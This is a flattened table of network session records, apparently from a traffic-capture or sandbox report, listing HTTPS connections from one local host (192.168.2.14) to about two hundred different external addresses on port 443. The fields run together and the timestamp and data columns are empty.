                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21375192.168.2.1443162221.173.148.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21376192.168.2.145834080.197.127.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21377192.168.2.1459050187.189.30.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21378192.168.2.1458402182.3.80.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21379192.168.2.1450742176.91.40.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21380192.168.2.145137890.88.99.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21381192.168.2.145567649.224.68.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21382192.168.2.1439760162.46.69.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21383192.168.2.145351063.83.152.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21384192.168.2.1443150188.68.123.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21385192.168.2.144178823.73.19.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21386192.168.2.1439046129.212.59.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21387192.168.2.146074023.203.87.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21388192.168.2.1443530195.126.60.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21389192.168.2.144890478.55.127.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21390192.168.2.1456634198.182.132.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21391192.168.2.144427450.111.217.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21392192.168.2.1455548107.247.64.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21393192.168.2.1442338174.245.18.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21394192.168.2.1453346142.110.163.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21395192.168.2.145788270.215.223.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21396192.168.2.144282051.79.189.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21397192.168.2.1445828190.121.15.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21398192.168.2.145029085.227.172.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21399192.168.2.1435892130.146.21.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21400192.168.2.144048471.232.160.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21401192.168.2.1447598102.131.145.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21402192.168.2.1453626169.165.131.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21403192.168.2.1452862165.113.108.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21404192.168.2.1437162115.77.247.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21405192.168.2.1446834221.237.184.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21406192.168.2.1434202170.51.195.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21407192.168.2.14490682.76.168.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21408192.168.2.1441410144.215.153.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21409192.168.2.1440898223.188.77.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21410192.168.2.144661269.111.122.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21411192.168.2.1452586210.182.85.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21412192.168.2.145691613.34.79.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21413192.168.2.145012045.98.129.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21414192.168.2.145264685.3.196.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21415192.168.2.145454086.176.127.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21416192.168.2.1451688136.102.189.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21417192.168.2.145055835.106.55.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21418192.168.2.1440224204.61.172.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21419192.168.2.1449570155.68.89.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21420192.168.2.145628620.228.129.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21421192.168.2.145755865.241.129.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21422192.168.2.144589636.29.113.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21423192.168.2.145556036.233.104.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21424192.168.2.1445012197.86.25.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21425192.168.2.14467344.168.234.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21426192.168.2.145761031.235.182.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21427192.168.2.1435516217.216.144.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21428192.168.2.143973814.5.7.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21429192.168.2.1437868123.1.78.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21430192.168.2.1439176217.225.248.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21431192.168.2.144361636.224.23.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21432192.168.2.1459368130.219.188.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21433192.168.2.145881095.129.186.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21434192.168.2.143589488.234.135.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21435192.168.2.1458922166.173.223.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21436192.168.2.1443354136.171.50.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21437192.168.2.144557289.158.167.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21438192.168.2.1448212145.122.175.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21439192.168.2.1437328129.159.99.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21440192.168.2.1446642160.199.183.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21441192.168.2.1450206197.205.155.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21442192.168.2.143653647.206.46.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21443192.168.2.1447272188.79.25.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21444192.168.2.143646275.110.140.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21445192.168.2.144953287.14.197.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21446192.168.2.145656817.126.152.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21447192.168.2.145372658.47.167.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21448192.168.2.146058679.69.206.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21449192.168.2.1453036201.64.198.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21450192.168.2.145564063.62.28.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21451192.168.2.145530078.224.217.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21452192.168.2.1438286154.128.129.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21453192.168.2.145647293.37.3.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21454192.168.2.146089831.166.39.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21455192.168.2.1456164101.152.49.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21456192.168.2.14511922.146.95.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21457192.168.2.1445204109.250.242.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21458192.168.2.1434272157.104.179.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21459192.168.2.144338047.99.1.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21460192.168.2.1457150130.17.191.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21461192.168.2.1443202129.174.214.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21462192.168.2.144715689.254.154.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21463192.168.2.1452050202.3.22.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21464192.168.2.1445952123.63.38.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21465192.168.2.1434406172.126.136.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21466192.168.2.144508832.187.14.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21467192.168.2.145824843.137.193.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21468192.168.2.143728882.106.168.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21469192.168.2.1441578150.157.189.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21470192.168.2.145344819.129.90.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21471192.168.2.1439508213.36.203.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21472192.168.2.1452548172.197.87.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21473192.168.2.144759866.3.148.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21474192.168.2.14368108.70.40.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21475192.168.2.1435628153.143.221.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21476192.168.2.144199884.123.99.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21477192.168.2.1452172165.230.7.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21478192.168.2.1449084178.214.99.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21479192.168.2.1450206207.65.103.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21480192.168.2.1451868184.77.156.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21481192.168.2.144247244.21.203.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21482192.168.2.144681225.146.234.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21483192.168.2.1459408205.107.185.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21484192.168.2.1434500212.93.193.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21485192.168.2.144711039.175.60.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21486192.168.2.1443796207.57.21.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21487192.168.2.14477702.206.103.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21488192.168.2.144549659.165.5.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21489192.168.2.145035834.180.26.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21490192.168.2.145098824.9.169.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21491192.168.2.1458372203.209.210.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21492192.168.2.1435580123.20.96.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21493192.168.2.1435726187.39.255.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21494192.168.2.145238873.167.233.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21495192.168.2.145202478.217.194.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21496192.168.2.144430289.226.254.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21497192.168.2.144132483.118.254.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21498192.168.2.145360474.228.1.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21499192.168.2.1435380168.193.145.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21500192.168.2.1458206120.244.66.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21501192.168.2.1447070101.41.201.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21502192.168.2.1448426136.15.94.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21503192.168.2.1434940114.165.20.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21504192.168.2.1452200169.9.145.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21505192.168.2.1437610173.82.135.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21506192.168.2.1437952122.148.86.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21507192.168.2.144882497.77.216.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21508192.168.2.144936071.52.60.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21509192.168.2.143931470.60.209.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21510192.168.2.1456276198.143.177.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21511192.168.2.1437850146.229.40.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21512192.168.2.1446314136.211.114.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21513192.168.2.1460908156.48.252.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21514192.168.2.1460198153.113.160.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21515192.168.2.1455718116.242.133.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21516192.168.2.144985063.223.166.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21517192.168.2.145547424.244.122.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21518192.168.2.145308498.91.43.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21519192.168.2.1451442134.179.41.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21520192.168.2.1457390213.125.205.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21521192.168.2.1445490110.97.7.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21522192.168.2.144311846.45.59.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21523192.168.2.1457962196.209.247.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21524192.168.2.1451924186.161.249.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21525192.168.2.144166496.173.39.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21526192.168.2.1438526105.98.253.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21527192.168.2.1447816130.199.89.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21528192.168.2.144050849.78.146.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21529192.168.2.1440106147.153.131.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21530192.168.2.1432922111.147.55.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21531192.168.2.145135413.167.107.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21532192.168.2.1432846191.174.191.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21533192.168.2.1447812223.15.150.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21534192.168.2.1449940164.138.224.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21535192.168.2.1437462210.44.172.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21536192.168.2.145585075.117.242.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21537192.168.2.145942457.198.137.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21538192.168.2.145680488.57.109.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21539192.168.2.145663674.225.94.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21540192.168.2.1444386196.97.112.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21541192.168.2.1458192108.229.157.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21542192.168.2.1438536181.154.194.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21543192.168.2.14607468.168.73.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21544192.168.2.144150261.73.205.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21545192.168.2.14406709.72.163.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21546192.168.2.144978477.157.104.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21547192.168.2.1460804175.13.50.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21548192.168.2.145863851.71.205.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21549192.168.2.144737480.184.138.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21550192.168.2.143580487.161.133.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21551192.168.2.1450176106.16.5.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21552192.168.2.144674831.227.181.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21553192.168.2.1459410170.32.252.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21554192.168.2.145764262.230.102.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21555192.168.2.145285067.150.35.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21556192.168.2.143850075.129.65.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21557192.168.2.1438912144.228.53.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21558192.168.2.1459032222.168.231.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21559192.168.2.1451656195.241.239.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21560192.168.2.1454910185.135.14.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21561192.168.2.1456646140.57.71.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21562192.168.2.144636666.175.248.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21563192.168.2.144657831.231.93.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21564192.168.2.145994431.95.85.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21565192.168.2.144450423.196.42.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21566192.168.2.1460598155.91.1.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21567192.168.2.143500845.239.15.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21568192.168.2.144662690.153.75.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21569192.168.2.1441630142.55.239.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21570192.168.2.1439270134.58.198.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21571192.168.2.144689838.204.174.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21572192.168.2.145224688.26.94.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21573192.168.2.143454617.11.17.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21574192.168.2.1453532154.217.196.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21575192.168.2.146008253.207.200.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21576192.168.2.143958634.53.126.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21577192.168.2.14405161.29.122.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21578192.168.2.145459871.174.19.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21579192.168.2.1450354160.193.29.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21580192.168.2.144276895.162.90.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21581192.168.2.145239087.126.18.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21582192.168.2.1441632193.133.41.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21583192.168.2.1449406221.69.168.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21584192.168.2.14344209.241.124.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21585192.168.2.14502121.0.144.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21586192.168.2.143866619.41.162.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
